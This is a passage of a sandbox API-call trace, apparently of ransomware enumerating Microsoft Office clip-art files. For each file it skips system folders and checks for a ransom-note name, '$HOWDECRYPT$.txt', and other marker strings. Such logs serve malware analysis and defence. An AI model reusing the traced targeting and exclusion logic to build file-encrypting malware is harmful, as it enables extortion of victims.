lpString2="System Volume Information") returned -1 [0097.651] lstrlenW (lpString="System Volume Information") returned 25 [0097.651] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 67 [0097.651] StrStrIW (lpFirst="FD02115_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.651] lstrcmpW (lpString1="FD02115_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.652] lstrcmpW (lpString1="FD02115_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.652] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 67 [0097.652] GetProcessHeap () returned 0x2c0000 [0097.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a6e0 [0097.652] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e08) returned 0x2c310e0 [0097.652] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.656] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="Windows") returned -1 [0097.656] lstrlenW (lpString="Windows") returned 7 [0097.656] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="$Recycle.bin") returned 1 [0097.656] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.656] lstrcmpiW (lpString1="FD02116_.WMF", lpString2="System Volume Information") returned -1 [0097.656] lstrlenW (lpString="System Volume Information") returned 25 [0097.656] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 67 [0097.656] StrStrIW (lpFirst="FD02116_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.656] lstrcmpW (lpString1="FD02116_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.656] lstrcmpW (lpString1="FD02116_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.656] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 67 [0097.656] GetProcessHeap () returned 0x2c0000 [0097.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x359170 [0097.656] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e08) returned 0x2c310e0 [0097.656] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.656] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="Windows") returned -1 [0097.657] lstrlenW (lpString="Windows") returned 7 [0097.657] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="$Recycle.bin") returned 1 [0097.657] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.657] lstrcmpiW (lpString1="FD02141_.WMF", lpString2="System Volume Information") returned -1 [0097.657] lstrlenW (lpString="System Volume Information") returned 25 [0097.657] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 67 [0097.657] StrStrIW (lpFirst="FD02141_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.657] lstrcmpW (lpString1="FD02141_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.657] lstrcmpW (lpString1="FD02141_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.657] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 67 [0097.657] GetProcessHeap () returned 0x2c0000 [0097.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a7b0 [0097.657] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e10) returned 0x2c310e0 [0097.657] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.657] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="Windows") returned -1 [0097.657] lstrlenW (lpString="Windows") returned 7 [0097.657] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="$Recycle.bin") returned 1 [0097.657] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.657] lstrcmpiW (lpString1="FD02153_.WMF", lpString2="System Volume Information") returned -1 [0097.657] lstrlenW (lpString="System Volume Information") returned 25 [0097.657] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 67 [0097.657] StrStrIW (lpFirst="FD02153_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.657] lstrcmpW (lpString1="FD02153_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.657] lstrcmpW (lpString1="FD02153_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.657] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 67 [0097.657] GetProcessHeap () returned 0x2c0000 [0097.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a880 [0097.658] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e18) returned 0x2c310e0 [0097.658] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.658] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="Windows") returned -1 [0097.658] lstrlenW (lpString="Windows") returned 7 [0097.658] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="$Recycle.bin") returned 1 [0097.658] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.658] lstrcmpiW (lpString1="FD02158_.WMF", lpString2="System Volume Information") returned -1 [0097.658] lstrlenW (lpString="System Volume Information") returned 25 [0097.658] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 67 [0097.658] StrStrIW (lpFirst="FD02158_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.658] lstrcmpW (lpString1="FD02158_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.658] lstrcmpW (lpString1="FD02158_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.658] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 67 [0097.658] GetProcessHeap () returned 0x2c0000 [0097.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1a950 [0097.658] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e20) returned 0x2c310e0 [0097.658] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.658] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="Windows") returned -1 [0097.658] lstrlenW (lpString="Windows") returned 7 [0097.658] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="$Recycle.bin") returned 1 [0097.658] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.658] lstrcmpiW (lpString1="FD02161_.WMF", lpString2="System Volume Information") returned -1 [0097.658] lstrlenW (lpString="System Volume Information") returned 25 [0097.658] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 67 [0097.658] StrStrIW (lpFirst="FD02161_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.658] lstrcmpW (lpString1="FD02161_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.658] lstrcmpW (lpString1="FD02161_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.659] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 67 [0097.659] GetProcessHeap () returned 0x2c0000 [0097.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1aa20 [0097.659] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e28) returned 0x2c310e0 [0097.659] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.659] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="Windows") returned -1 [0097.659] lstrlenW (lpString="Windows") returned 7 [0097.659] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="$Recycle.bin") returned 1 [0097.659] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.659] lstrcmpiW (lpString1="FINCL_01.MID", lpString2="System Volume Information") returned -1 [0097.659] lstrlenW (lpString="System Volume Information") returned 25 [0097.659] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 67 [0097.659] StrStrIW (lpFirst="FINCL_01.MID", lpSrch=".spyhunter") returned 0x0 [0097.659] lstrcmpW (lpString1="FINCL_01.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.659] lstrcmpW (lpString1="FINCL_01.MID", lpString2="_uninstalling_.png") returned 1 [0097.659] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 67 [0097.659] GetProcessHeap () returned 0x2c0000 [0097.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1aaf0 [0097.659] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e30) returned 0x2c310e0 [0097.659] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.659] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="Windows") returned -1 [0097.659] lstrlenW (lpString="Windows") returned 7 [0097.659] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="$Recycle.bin") returned 1 [0097.659] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.659] lstrcmpiW (lpString1="FINCL_02.MID", lpString2="System Volume Information") returned -1 [0097.659] lstrlenW (lpString="System Volume Information") returned 25 [0097.660] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 67 [0097.660] StrStrIW (lpFirst="FINCL_02.MID", lpSrch=".spyhunter") returned 0x0 [0097.660] lstrcmpW (lpString1="FINCL_02.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.660] lstrcmpW (lpString1="FINCL_02.MID", lpString2="_uninstalling_.png") returned 1 [0097.660] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 67 [0097.660] GetProcessHeap () returned 0x2c0000 [0097.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1abc0 [0097.660] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e38) returned 0x2c310e0 [0097.660] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.660] lstrcmpiW (lpString1="FLAP.WMF", lpString2="Windows") returned -1 [0097.660] lstrlenW (lpString="Windows") returned 7 [0097.660] lstrcmpiW (lpString1="FLAP.WMF", lpString2="$Recycle.bin") returned 1 [0097.660] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.660] lstrcmpiW (lpString1="FLAP.WMF", lpString2="System Volume Information") returned -1 [0097.660] lstrlenW (lpString="System Volume Information") returned 25 [0097.660] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 63 [0097.660] StrStrIW (lpFirst="FLAP.WMF", lpSrch=".spyhunter") returned 0x0 [0097.660] lstrcmpW (lpString1="FLAP.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.660] lstrcmpW (lpString1="FLAP.WMF", lpString2="_uninstalling_.png") returned 1 [0097.660] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FLAP.WMF") returned 63 [0097.660] GetProcessHeap () returned 0x2c0000 [0097.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc0) returned 0x32d4f0 [0097.660] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e40) returned 0x2c310e0 [0097.660] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.660] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="Windows") returned -1 [0097.660] lstrlenW (lpString="Windows") returned 7 [0097.660] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="$Recycle.bin") returned 1 [0097.661] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.661] lstrcmpiW (lpString1="GRDEN_01.MID", lpString2="System Volume Information") returned -1 [0097.661] lstrlenW (lpString="System Volume Information") returned 25 [0097.661] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 67 [0097.661] StrStrIW (lpFirst="GRDEN_01.MID", lpSrch=".spyhunter") returned 0x0 [0097.661] lstrcmpW (lpString1="GRDEN_01.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.661] lstrcmpW (lpString1="GRDEN_01.MID", lpString2="_uninstalling_.png") returned 1 [0097.661] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 67 [0097.661] GetProcessHeap () returned 0x2c0000 [0097.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1ac90 [0097.661] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e48) returned 0x2c310e0 [0097.661] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.661] lstrcmpiW (lpString1="GRID_01.MID", lpString2="Windows") returned -1 [0097.661] lstrlenW (lpString="Windows") returned 7 [0097.661] lstrcmpiW (lpString1="GRID_01.MID", lpString2="$Recycle.bin") returned 1 [0097.661] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.661] lstrcmpiW (lpString1="GRID_01.MID", lpString2="System Volume Information") returned -1 [0097.661] lstrlenW (lpString="System Volume Information") returned 25 [0097.661] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 66 [0097.661] StrStrIW (lpFirst="GRID_01.MID", lpSrch=".spyhunter") returned 0x0 [0097.661] lstrcmpW (lpString1="GRID_01.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.661] lstrcmpW (lpString1="GRID_01.MID", lpString2="_uninstalling_.png") returned 1 [0097.661] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRID_01.MID") returned 66 [0097.661] GetProcessHeap () returned 0x2c0000 [0097.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x2c1ad60 [0097.661] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e50) returned 0x2c310e0 [0097.662] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.662] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="Windows") returned -1 [0097.662] lstrlenW (lpString="Windows") returned 7 [0097.662] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="$Recycle.bin") returned 1 [0097.662] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.662] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="System Volume Information") returned -1 [0097.662] lstrlenW (lpString="System Volume Information") returned 25 [0097.662] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 67 [0097.662] StrStrIW (lpFirst="HH00057_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.662] lstrcmpW (lpString1="HH00057_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.662] lstrcmpW (lpString1="HH00057_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.662] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 67 [0097.662] GetProcessHeap () returned 0x2c0000 [0097.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1ae30 [0097.662] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e58) returned 0x2c310e0 [0097.662] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.662] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="Windows") returned -1 [0097.662] lstrlenW (lpString="Windows") returned 7 [0097.662] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="$Recycle.bin") returned 1 [0097.662] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.662] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="System Volume Information") returned -1 [0097.662] lstrlenW (lpString="System Volume Information") returned 25 [0097.662] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 67 [0097.662] StrStrIW (lpFirst="HH00084_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.662] lstrcmpW (lpString1="HH00084_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.662] lstrcmpW (lpString1="HH00084_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.662] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 67 [0097.663] GetProcessHeap () returned 0x2c0000 [0097.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1af00 [0097.663] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e60) returned 0x2c310e0 [0097.663] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.663] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="Windows") returned -1 [0097.663] lstrlenW (lpString="Windows") returned 7 [0097.663] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="$Recycle.bin") returned 1 [0097.663] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.663] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="System Volume Information") returned -1 [0097.663] lstrlenW (lpString="System Volume Information") returned 25 [0097.663] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 67 [0097.797] StrStrIW (lpFirst="HH00231_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.797] lstrcmpW (lpString1="HH00231_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.797] lstrcmpW (lpString1="HH00231_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.797] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 67 [0097.797] GetProcessHeap () returned 0x2c0000 [0097.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c320 [0097.797] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e60) returned 0x2c310e0 [0097.797] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.797] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="Windows") returned -1 [0097.797] lstrlenW (lpString="Windows") returned 7 [0097.797] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="$Recycle.bin") returned 1 [0097.797] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.797] lstrcmpiW (lpString1="HH00235_.WMF", lpString2="System Volume Information") returned -1 [0097.797] lstrlenW (lpString="System Volume Information") returned 25 [0097.797] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 67 [0097.797] StrStrIW (lpFirst="HH00235_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.797] lstrcmpW (lpString1="HH00235_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.797] lstrcmpW (lpString1="HH00235_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.798] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 67 [0097.798] GetProcessHeap () returned 0x2c0000 [0097.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1afd0 [0097.798] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e68) returned 0x2c310e0 [0097.798] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.798] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="Windows") returned -1 [0097.798] lstrlenW (lpString="Windows") returned 7 [0097.798] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="$Recycle.bin") returned 1 [0097.798] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.798] lstrcmpiW (lpString1="HH00236_.WMF", lpString2="System Volume Information") returned -1 [0097.798] lstrlenW (lpString="System Volume Information") returned 25 [0097.798] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 67 [0097.798] StrStrIW (lpFirst="HH00236_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.798] lstrcmpW (lpString1="HH00236_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.798] lstrcmpW (lpString1="HH00236_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.798] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00236_.WMF") returned 67 [0097.798] GetProcessHeap () returned 0x2c0000 [0097.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12060 [0097.798] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e70) returned 0x2c310e0 [0097.798] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.798] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="Windows") returned -1 [0097.798] lstrlenW (lpString="Windows") returned 7 [0097.799] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="$Recycle.bin") returned 1 [0097.799] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.799] lstrcmpiW (lpString1="HH00241_.WMF", lpString2="System Volume Information") returned -1 [0097.799] lstrlenW (lpString="System Volume Information") returned 25 [0097.799] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 67 [0097.799] StrStrIW (lpFirst="HH00241_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.799] lstrcmpW (lpString1="HH00241_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.799] lstrcmpW (lpString1="HH00241_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.799] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 67 [0097.799] GetProcessHeap () returned 0x2c0000 [0097.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12130 [0097.799] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e78) returned 0x2c310e0 [0097.799] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.799] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="Windows") returned -1 [0097.799] lstrlenW (lpString="Windows") returned 7 [0097.799] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="$Recycle.bin") returned 1 [0097.799] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.799] lstrcmpiW (lpString1="HH00260_.WMF", lpString2="System Volume Information") returned -1 [0097.799] lstrlenW (lpString="System Volume Information") returned 25 [0097.799] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 67 [0097.799] StrStrIW (lpFirst="HH00260_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.799] lstrcmpW (lpString1="HH00260_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.800] lstrcmpW (lpString1="HH00260_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.800] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 67 [0097.800] GetProcessHeap () returned 0x2c0000 [0097.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c12200 [0097.800] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e80) returned 0x2c310e0 [0097.800] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.800] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="Windows") returned -1 [0097.800] lstrlenW (lpString="Windows") returned 7 [0097.800] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="$Recycle.bin") returned 1 [0097.800] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.800] lstrcmpiW (lpString1="HH00276_.WMF", lpString2="System Volume Information") returned -1 [0097.800] lstrlenW (lpString="System Volume Information") returned 25 [0097.800] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 67 [0097.800] StrStrIW (lpFirst="HH00276_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.800] lstrcmpW (lpString1="HH00276_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.800] lstrcmpW (lpString1="HH00276_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.800] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 67 [0097.800] GetProcessHeap () returned 0x2c0000 [0097.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c122d0 [0097.800] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1e88) returned 0x2c310e0 [0097.800] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.800] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="Windows") returned -1 [0097.801] lstrlenW (lpString="Windows") returned 7 [0097.801] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="$Recycle.bin") returned 1 [0097.801] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.801] lstrcmpiW (lpString1="HH00334_.WMF", lpString2="System Volume Information") returned -1 [0097.801] lstrlenW (lpString="System Volume Information") returned 25 [0097.801] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 